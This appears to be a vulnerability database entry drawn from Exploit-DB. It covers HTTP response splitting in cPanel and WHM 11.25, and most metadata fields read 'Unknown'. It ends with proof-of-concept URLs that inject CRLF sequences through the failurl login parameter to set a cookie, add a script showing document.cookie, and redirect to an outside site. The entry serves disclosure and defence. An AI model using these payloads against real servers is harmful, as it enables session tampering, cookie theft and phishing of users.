cPanel and WHM HTTP Response-Splitting Vulnerability

vendor:

cPanel and WHM

by:

Unknown

N/A

CVSS

N/A

HTTP response-splitting

Unknown

CWE

Product Name: cPanel and WHM

Affected Version From: cPanel 11.25

Affected Version To: Unknown

Patch Exists: Unknown

Related CWE: Unknown

CPE: Unknown

Metasploit:

Other Scripts:

Platforms Tested: Unknown

Unknown

cPanel and WHM HTTP Response-Splitting Vulnerability

Attackers can leverage this issue to influence or misrepresent how web content is served, cached, or interpreted. This could aid in various attacks that try to entice client users into a false sense of trust.

Mitigation:

Unknown

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/37902/info

cPanel and WHM is prone to an HTTP response-splitting vulnerability.

Attackers can leverage this issue to influence or misrepresent how web content is served, cached, or interpreted. This could aid in various attacks that try to entice client users into a false sense of trust.

cPanel 11.25 and WHM 11.25 are vulnerable; other versions may also be affected. 

http://www.example.com/login/?user=foo&pass=bar&failurl=%0D%0ASet-Cookie%3A%20Rec=Sec
http://www.example.com/login/?user=foo&pass=bar&failurl=%0D%0AContent-Type:%20text/html%0D%0A%0D%0A%3Cscript%3Ealert%28%22Recognize-Security%20-%20%22%2Bdocument.cookie%29;%3C/script%3E%3C!--
http://www.example.com/login/?user=foo&pass=bar&failurl=http://www.rec-sec.com